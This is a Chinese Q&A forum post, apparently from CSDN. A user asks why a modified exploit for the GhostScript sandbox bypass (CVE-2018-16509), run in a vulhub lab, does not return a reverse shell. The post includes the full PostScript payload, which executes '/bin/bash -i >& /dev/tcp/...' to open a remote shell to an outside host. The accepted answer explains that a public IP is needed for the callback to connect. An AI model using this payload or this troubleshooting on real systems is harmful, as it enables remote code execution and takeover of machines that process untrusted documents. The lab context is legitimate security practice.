acvxd123 2022-09-12 11:03 采纳率: 64.1%
浏览 19
已结题

下面的代码改成反弹shell执行失败,怎么改?

我想要达到的结果

vulhub里面漏洞——GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
反弹不了,应该怎么改啊

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%exec("/bin/bash -i >& /dev/tcp/192.168.52.0/8888") > /tmp/nxx && cat /tmp/nxx) currentdevice putdeviceprops

  • 写回答

2条回答 默认 最新

  • ????27282 网络安全领域优质创作者 2022-09-17 09:07
    关注

    vulhub里面漏洞?
    你需要你个公网ip去做反弹,不然靶机找不到192.168.52.0 (内网)

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(1条)

报告相同问题?

问题事件

  • 系统已结题 9月27日
  • 已采纳回答 9月19日
  • 创建了问题 9月12日

悬赏问题

  • ¥20 给自己本科IT专业毕业的妹m找个实习工作
  • ¥15 用友U8:向一个无法连接的网络尝试了一个套接字操作,如何解决?
  • ¥30 我的代码按理说完成了模型的搭建、训练、验证测试等工作(标签-网络|关键词-变化检测)
  • ¥50 mac mini外接显示器 画质字体模糊
  • ¥15 TLS1.2协议通信解密
  • ¥40 图书信息管理系统程序编写
  • ¥20 Qcustomplot缩小曲线形状问题
  • ¥15 企业资源规划ERP沙盘模拟
  • ¥15 树莓派控制机械臂传输命令报错,显示摄像头不存在
  • ¥15 前端echarts坐标轴问题